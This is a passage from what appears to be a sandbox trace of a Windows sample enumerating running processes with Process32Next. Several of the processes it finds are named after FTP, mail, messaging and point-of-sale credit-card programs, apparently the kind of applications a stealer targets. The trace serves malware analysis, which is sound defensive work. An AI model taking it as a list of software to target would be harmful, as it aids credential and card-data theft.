lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.876] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.877] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.878] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.879] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.881] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.882] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.883] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.885] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.889] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.890] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.892] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.893] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.894] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.896] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.897] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.898] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.900] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.987] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.988] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.990] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.992] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.994] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.995] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0246.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.001] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.002] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.005] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.006] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0247.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0247.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0247.011] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0247.015] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0247.016] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0247.018] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0247.019] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0247.020] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0247.022] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0247.023] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0247.024] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0247.032] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0247.033] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0247.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0247.036] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0247.038] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0247.039] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.041] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.046] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.049] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.050] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.052] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.054] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.055] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.057] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0247.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0247.064] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0247.066] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0247.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0247.069] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0247.071] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0247.119] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0247.160] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0247.162] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0247.164] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0247.165] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0247.169] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0247.171] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0247.174] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0247.176] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0247.178] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0247.180] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0247.186] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0247.188] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0247.191] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0247.193] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0247.196] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0247.219] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0247.222] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0247.224] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0247.226] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0247.228] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0247.233] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0247.236] 